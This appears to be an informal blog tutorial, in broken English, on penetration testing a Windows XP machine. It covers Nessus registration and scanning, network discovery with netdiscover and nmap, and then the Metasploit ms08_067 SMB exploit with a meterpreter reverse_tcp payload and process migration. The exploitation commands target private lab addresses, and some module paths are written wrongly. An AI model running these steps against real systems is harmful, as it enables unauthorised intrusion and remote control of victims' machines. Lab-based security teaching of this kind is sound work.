numberthree

numberthree

re-registration nessus :

googling nessus register, choose www.teenable.com

choose free register

input register data

log in to your email, check your activation code.

register in terminal and put in you activation code

opt/nessus/sbin/nessusclifetch --register "code number"


nessus will be download

z

after dowloasing finish, start nessus in terminal

/etc/init.d/nessusd start

entry nessus use web

signing in nessus, nessus allready to use










nessus is one of more tools to scanner the vulnerability of system or running application.

there are 4 level result of nessus scanner such as critical, medium, low and information.

For entry to a system and get or use information that was in there, you have to do exploit the system.

before you can exploit the system, you must collecting data related the system.  this step is call information gathering. the information that could be find about the system such as network (ip address), service or running application and information of operating system that the computer use.
we can use netdiscover to find the computer who connected to us.

netdiscover -i (network we use) -r (ip range)








next step is service enumeration, we need to know what and how much application running in that system. we can use nmap to get more information about the system include the running service




nmap -A (IP)









third step is vulnerrability service. after we know about the running application we try to find the vulnerrability of a system. the vulberablity of a system is access to infiltrating into system. we can use nessus to find and identification weekness of a system.

entry to nessus, signing in

type the name and description of your work. because nessus can save your work file, so you can open the file and see it on offline.
then, you type the ip target.
after you type the blank table, you click save to start scanning the target

nessus are scanning the vulnerability of system

if the scanning is over, you can click the result, you can see the description of vulnerability based on level, start from critical, medium, low vulner and just information for we know about the system.




now you already know the vulnerability of target sistem, that information you use to next step you must do, that is exploit. to exploit the sistem you can use some tools such as metasploit, exploit DB etc. this session we practice use metasploit. metasploit is a frame work include some application or moduls to exploit the sistem.

entry to metasploit,

type msfconsole, klick enter

in metasploit there are more modules to exploit the system, the use of moduls related information we have got in step before, there are in VA step. we use moduls that exploit the weekness of our target system.

for the example we will attack the windows xp, in VA we knew that one of the critical vulnerability of windows xp is in smb.
so we type,
use metasploit/windows/smb/ than klick tab twice,
will show any moduls related to what our type, choose one of them, ex :
use metasploit/windows/smb/ ms08_067_netapi klick enter

automatically we entri to netapi moduls, and show option and then we input the RHOST data or ip target
set RHOST (IP Target)

set RHOST 192.168.56.101

open any virus or back door that we can exploit to system,
show payload

choose one of them,
set PAYLOAD windows/meterpreter/reverse_tcp klick enter

show option and then we input the LHOST data or ip target
set LHOST (IP Reserver)

set LHOST 192.168.56.1




type exploit klick enter

you already exploit and infiltrating to windows xp
 







to view all of command to controll eindows xp from terminal linux we type help.

the important thin you must remember is the network that we use to come to widows xp are temporary, so we need to move to another place  that have longest network time to inthernet, there are explorer.

type ps to view the process list
find explorer pid, then migrate to it

migrate 1684






thats all i can to explain you about hacking windows xp use metasploit.